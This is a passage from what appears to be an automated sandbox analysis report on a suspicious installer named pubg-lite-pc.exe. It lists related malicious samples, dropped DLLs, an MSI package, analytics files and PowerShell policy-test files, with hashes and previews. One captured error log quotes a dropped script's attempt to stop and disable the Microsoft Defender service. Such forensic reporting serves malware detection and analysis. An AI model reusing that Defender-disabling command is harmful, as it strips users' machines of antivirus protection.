                                                                                      SecuriteInfo.com.Trojan.GenericKD.61210806.19473.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      VCcX0uplma.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      rErE9Xx0IK.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4
                                                                                      Mh6uklYA6E.exeGet hashmaliciousBrowse
                                                                                      • 140.82.121.4

                                                                                      Dropped Files

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      C:\Users\user\AppData\Local\Temp\Common Apps\1.3.5\decoder.dllpubg-lite-pc.exeGet hashmaliciousBrowse
                                                                                        C:\Users\user\AppData\Local\Temp\MSIE937.tmppubg-lite-pc.exeGet hashmaliciousBrowse
                                                                                          C:\Users\user\AppData\Local\Temp\INAE5E9.tmppubg-lite-pc.exeGet hashmaliciousBrowse
                                                                                            C:\Users\user\AppData\Local\Temp\MSIE7DF.tmppubg-lite-pc.exeGet hashmaliciousBrowse

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\Local\AdvinstAnalytics\617ebaa6a255ac1179c4d852\1.3.5\tracking.ini

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\pubg-lite-pc.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):84
                                                                                              Entropy (8bit):4.973763666873147
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:1E3ORBqKLTXX6Odk5nPWXVUNrlkwMyvn:14+BqQbqpnuXV2PN
                                                                                              MD5:C7D40F0CBB9266CD83D70D1CF00618F7
                                                                                              SHA1:52D896B011EE8AE29581B01C43F497AD5AC3354B
                                                                                              SHA-256:57E0F114909E3C36875C92D6DC1E9AA2B7B890236D421551F88F2BB963C56851
                                                                                              SHA-512:C9B1465AD6E539A5CF506F5C79907C2BC8C5DF5FCD72E6DF558E11B9C6279D5183E4239324DDDE57E57E4A45953E408CD49ED7D0DB082BE030634D37907AD217
                                                                                              Malicious:false
                                                                                              Preview:[General]..Current Session = {57F20289-A8FD-48A1-97B3-330A010BF22B}..Active = true..

                                                                                              C:\Users\user\AppData\Local\AdvinstAnalytics\617ebaa6a255ac1179c4d852\1.3.5\{20EB55FE-2CDA-48ED-B3BB-914A2FCA27F7}.session

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\pubg-lite-pc.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):308
                                                                                              Entropy (8bit):5.278150537234493
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:The0gPFJnFCDjfZQBGSbN7/FO0yW0zcbsAjxaEYcd0PhCUawn:tedXFAjZQBGSbJgjW0goAjFY8q6wn
                                                                                              MD5:94D8357E5BB08625F44A677743C0F6EB
                                                                                              SHA1:C3B0D7AE22E338A71FA9A20044A08BC0ABDA221C
                                                                                              SHA-256:A5A5CC8DC907A198E156FDA203349AC46BCC8BB5CC13D16100E53A51AC5C1309
                                                                                              SHA-512:C882B580756297D4B4D4E8ECC2E269BC7DB01A4B2627BCDE031EA32C323BCCC8F9A416E8910BACB4A0E48E6E62C7CEC028D3AEFB2A87FE73BBD15C00DFD7F34B
                                                                                              Malicious:false
                                                                                              Preview:[Hit {9D93DD3D-516B-4D1B-840E-C964526FE8F6}]..Queue Time = 47..Hit Type = lifecycle..Life control = start..Protocol Version = 3..Application ID = 617ebaa6a255ac1179c4d852..Application Version = 1.3.5..Client ID = 4E7FC07BE2793C9B2DB5A9976099F2658AD99AA9..Session ID = {20EB55FE-2CDA-48ED-B3BB-914A2FCA27F7}..

                                                                                              C:\Users\user\AppData\Local\AdvinstAnalytics\617ebaa6a255ac1179c4d852\1.3.5\{57F20289-A8FD-48A1-97B3-330A010BF22B}.session

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):12628
                                                                                              Entropy (8bit):5.392974814342962
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:XmfmcmxfmfmPmEmjmSmiammvm3mGmiymFmYmOmGmQmnmWm8mqmlm7mQhm2mYmQmb:Xs7I++tctHa3v21SQpXpjQlHxAWxB7RE
                                                                                              MD5:41FFB2CA0470A31F1F8F77428225834E
                                                                                              SHA1:48D2389E2BC298F450C3AE17558BFE6FD77F1030
                                                                                              SHA-256:CF802311D176AFE20EB5E7FF43147FB3F4EA3B8D64AC4BED8636E2B4ED409B68
                                                                                              SHA-512:C9ED2C525EB881C40E2FF956E9B94C45C18463BE745C0C6DBABDAB2464CDB9A85F614F7E1E74166F354CFBCBEED06E3A7FA12E504D80E206C40E8373FEDF660F
                                                                                              Malicious:false
                                                                                              Preview:[Hit {D7447D26-B11F-4187-8F95-A512A66CA987}]..Queue Time = 47..Hit Type = lifecycle..Life control = start..Protocol Version = 3..Application ID = 617ebaa6a255ac1179c4d852..Application Version = 1.3.5..Client ID = 4E7FC07BE2793C9B2DB5A9976099F2658AD99AA9..Session ID = {57F20289-A8FD-48A1-97B3-330A010BF22B}....[Hit {82A9C31F-6FA3-49CD-8A14-249C1AA3593C}]..Queue Time = 0..Hit Type = property..Label = VersionNT..Value = 1000..Protocol Version = 3..Application ID = 617ebaa6a255ac1179c4d852..Application Version = 1.3.5..Client ID = 4E7FC07BE2793C9B2DB5A9976099F2658AD99AA9..Session ID = {57F20289-A8FD-48A1-97B3-330A010BF22B}....[Hit {59BAF184-2723-4C7C-A2D1-98B776BF9B32}]..Queue Time = 0..Hit Type = property..Label = VersionNT64..Value = 1000..Protocol Version = 3..Application ID = 617ebaa6a255ac1179c4d852..Application Version = 1.3.5..Client ID = 4E7FC07BE2793C9B2DB5A9976099F2658AD99AA9..Session ID = {57F20289-A8FD-48A1-97B3-330A010BF22B}....[Hit {D03DCFA2-6806-406B-B994-7B64AF60E4FE}]..Queu

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):0.34726597513537405
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Nlll:Nll
                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                              Malicious:false
                                                                                              Preview:@...e...........................................................

                                                                                              C:\Users\user\AppData\Local\Temp\Common Apps\1.3.5\1BA8BE5\pubg-lite-pc.msi

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\pubg-lite-pc.exe
                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {7635BF72-F904-48E9-A5E0-CD77B63088C0}, Number of Words: 0, Subject: pubg-lite-pc, Author: Common Apps, Name of Creating Application: Advanced Installer 18.3 build e2a0201b, Template: x64;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                              Category:dropped
                                                                                              Size (bytes):4094464
                                                                                              Entropy (8bit):6.547203235586271
                                                                                              Encrypted:false
                                                                                              SSDEEP:98304:lY5AKxMKKknz5vquOjDT+Yn4POYWIdjfIRuRvdisRe4frUMXj:GnYuOjDKYn49d2uHisRVj
                                                                                              MD5:918288F3B5A6BD0E461AF50517273210
                                                                                              SHA1:BAC9AD4AF1B50142612D743577A70DE6DC802EB5
                                                                                              SHA-256:BA89E19751BD5F845669C8FE1C32FEC3BB8ED380CA058DB04B69E6F1E48BE24E
                                                                                              SHA-512:A3DABFC4DECEBA69E051CE1D3AD7D5FF1BB7A5FA2ED09EE65785569CF990B4F9122E433654010A2657E558E11148F18BDF025DD650414780F0EA5187047E814A
                                                                                              Malicious:false
                                                                                              Preview:......................>...................?...................................{...............................................................................o...p...q.......................................O...P...Q...R...S...T...U...V...W...........................................................................................................................................................................................................................................................................................m...............*...8........................................................................................... ...!..."...#...$...%...&...'...(...)...7...+...:...-......./...0...1...2...3...4...5...6.......9...L...;...?...<...=...>...A...@...I...B...C...D...E...F...G...H.......J...K...R...M...N...O...P...Q.......S...l...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k.......n...z...o...p...q...r...s...t...u...v...w...x...y...|...

                                                                                              C:\Users\user\AppData\Local\Temp\Common Apps\1.3.5\decoder.dll

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\pubg-lite-pc.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):206848
                                                                                              Entropy (8bit):6.455929472179143
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:iAks1YEbj/RY1chmT86lO2XkzjCN4d0N1crZ9RAZQH5lsOkbXXFfM9:vj2rAGKvdkcrZ3xsOkbnZM9
                                                                                              MD5:15AA573CEE52CC4C11527DEE98BEA20C
                                                                                              SHA1:32FE5DA57BBE66425C3D3C89A28E7125FB0097B3
                                                                                              SHA-256:6889EA3A9D69F176351A389F92537D521ABC851D1B71B47AB21C3B821CFF8622
                                                                                              SHA-512:4B357DC6EB8BDC152B63BC0A5F5BCE6196CF65E02A71D32EE6568D477B359C2A4AB04892249CFDB8712EB5C8AB1A78E675DB47F8B3150CF2C107DC61032CD085
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: pubg-lite-pc.exe, Detection: malicious, Browse
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........;...;...;.../...1.../.................+........../...(.../...<...;..........g......:......:...;.y.:......:...Rich;...................PE..L.....`.........."!.....X...................p............................................@.................................|...<....p.. ...............................p........................... ...@............p..t............................text....V.......X.................. ..`.rdata......p.......\..............@..@.data...dV..........................@....rsrc... ....p......................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\INAE5E9.tmp

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\pubg-lite-pc.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):780768
                                                                                              Entropy (8bit):6.387720196228063
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                                                                                              MD5:573F5E653258BF622AE1C0AD118880A2
                                                                                              SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                                                                                              SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                                                                                              SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: pubg-lite-pc.exe, Detection: malicious, Browse
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\MSIE7DF.tmp

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\pubg-lite-pc.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):388064
                                                                                              Entropy (8bit):6.407392408414975
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:U7C5QB3/CNG2HBOqf2BLuoZSKYfuAO8DOE09VKYnyZwYW:qB3WBOG2BPDKSf9VtyZNW
                                                                                              MD5:20C782EB64C81AC14C83A853546A8924
                                                                                              SHA1:A1506933D294DE07A7A2AE1FBC6BE468F51371D6
                                                                                              SHA-256:0ED6836D55180AF20F71F7852E3D728F2DEFE22AA6D2526C54CFBBB4B48CC6A1
                                                                                              SHA-512:AFF21E3E00B39F8983D101A0C616CA84CC3DC72D6464A0DD331965CF6BECCF9B45025A7DB2042D6E8B05221D3EB5813445C8ADA69AE96E2727A607398A3DE3D9
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: pubg-lite-pc.exe, Detection: malicious, Browse
                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b2..&S..&S..&S..28..+S..28..S...'..)S...'..1S...'..aS..28..?S..28..'S..28..;S..&S..wR...'..tS...'..'S...'+.'S..&SC.'S...'..'S..Rich&S..........................PE..L.....`.........."!.................Z..............................................a.....@.........................@n.......v..........0.......................d?..X...p...............................@............... ............................text............................... ..`.rdata.............................@..@.data...............................@....rsrc...0...........................@..@.reloc..d?.......@..................@..B........................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\MSIE937.tmp

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\pubg-lite-pc.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):878560
                                                                                              Entropy (8bit):6.452749824306929
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:QK8S3AccKkqSojmrhCMou5vk3Y+ukDln/hFRFNUEekB:QK8tKk5ojmrhCMz5vk3ukDln/hFRFNU0
                                                                                              MD5:D51A7E3BCE34C74638E89366DEEE2AAB
                                                                                              SHA1:0E68022B52C288E8CDFFE85739DE1194253A7EF0
                                                                                              SHA-256:7C6BDF16A0992DB092B7F94C374B21DE5D53E3043F5717A6EECAE614432E0DF5
                                                                                              SHA-512:8ED246747CDD05CAC352919D7DED3F14B1E523CCC1F7F172DB85EED800B0C5D24475C270B34A7C25E7934467ACE7E363542A586CDEB156BFC484F7417C3A4AB0
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: pubg-lite-pc.exe, Detection: malicious, Browse
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j{..............`.......`..W...<.......<.......<.......`.......`.......`..............>.......>.......>...............>.......Rich....................PE..L...}.`.........."!.........|...........................................................@............................t...T........................N..............X}..p....................~.......}..@............................................text............................... ..`.rdata..............................@..@.data...\...........................@....rsrc................^..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\Pro1DB8.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):689
                                                                                              Entropy (8bit):4.897816547913811
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:cEWS4PyqsAXvRafHB5kA8LXcuW4+4+phknePLMEky1:BA7syvA/IA8SMKMEj1
                                                                                              MD5:E49D846D20F28744FA0E68F6BFE35D45
                                                                                              SHA1:0431C3256988DE8CB4A5B903D695FE8902395BA1
                                                                                              SHA-256:81BA9693125473DC89A322ABC10F522AB2F9F7FACCD97AC42A011B4EB8B624A3
                                                                                              SHA-512:7A04D20A9F1D7D9876F54DBEB0D81F8C9852A93B25DDEACCFEB876E8C8432F3CD0850DDDD0DDDC559E01FD890AE6DDE893DF3A863AFFCCC94E450175D018E66E
                                                                                              Malicious:false
                                                                                              Preview:Stop-Service : Service 'Microsoft Defender Antivirus Service (WinDefend)' cannot be stopped due to the following ..error: Cannot open WinDefend service on computer '.'...At C:\Users\user\AppData\Local\Temp\scr1D28.ps1:4 char:25..+ Get-Service WinDefend | Stop-Service -PassThru | Set-Service -Startup .....+ ~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : CloseError: (System.ServiceProcess.ServiceController:ServiceController) [Stop-Service], .. ServiceCommandException.. + FullyQualifiedErrorId : CouldNotStopService,Microsoft.PowerShell.Commands.StopServiceCommand.. ..ERROR: A positional parameter cannot be found that accepts argument 'start='...

                                                                                              C:\Users\user\AppData\Local\Temp\Pro3F25.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):73
                                                                                              Entropy (8bit):4.408820881231458
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:RLgmzRZHwkgL1Y1dglv:RLgmzRZrgL5
                                                                                              MD5:873E918E1DACE1596115DD0962773534
                                                                                              SHA1:DEF5ED034C4D45E9756CA13BD596601CD4435057
                                                                                              SHA-256:65A905358793790CA5CCB3C2955057E152E52C46BD512F9A379C170EE7409DD9
                                                                                              SHA-512:35F56FCFD38B63D7A0784450E964F36CEB82004295C6BD6B80C4E024467F0FBC250C515B0E25F49935DACFB792A3AECBADC359AAE1844B0D982BE9DB6FC86EFE
                                                                                              Malicious:false
                                                                                              Preview:ERROR: The request was aborted: The connection was closed unexpectedly...

                                                                                              C:\Users\user\AppData\Local\Temp\ProE603.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):73
                                                                                              Entropy (8bit):4.408820881231458
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:RLgmzRZHwkgL1Y1dglv:RLgmzRZrgL5
                                                                                              MD5:873E918E1DACE1596115DD0962773534
                                                                                              SHA1:DEF5ED034C4D45E9756CA13BD596601CD4435057
                                                                                              SHA-256:65A905358793790CA5CCB3C2955057E152E52C46BD512F9A379C170EE7409DD9
                                                                                              SHA-512:35F56FCFD38B63D7A0784450E964F36CEB82004295C6BD6B80C4E024467F0FBC250C515B0E25F49935DACFB792A3AECBADC359AAE1844B0D982BE9DB6FC86EFE
                                                                                              Malicious:false
                                                                                              Preview:ERROR: The request was aborted: The connection was closed unexpectedly...

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0urukb2n.ujf.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_35h2lepb.eyu.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dkfx503.wml.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ojf2qaf.vl4.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ckehghvk.kpu.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pv3gp2fi.tjn.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3c3ir15.biq.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3e1ujws.zwb.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sehdsziv.v5f.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tjigelbk.n0t.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vzppkwaw.pfs.psm1

                                                                                              Download File
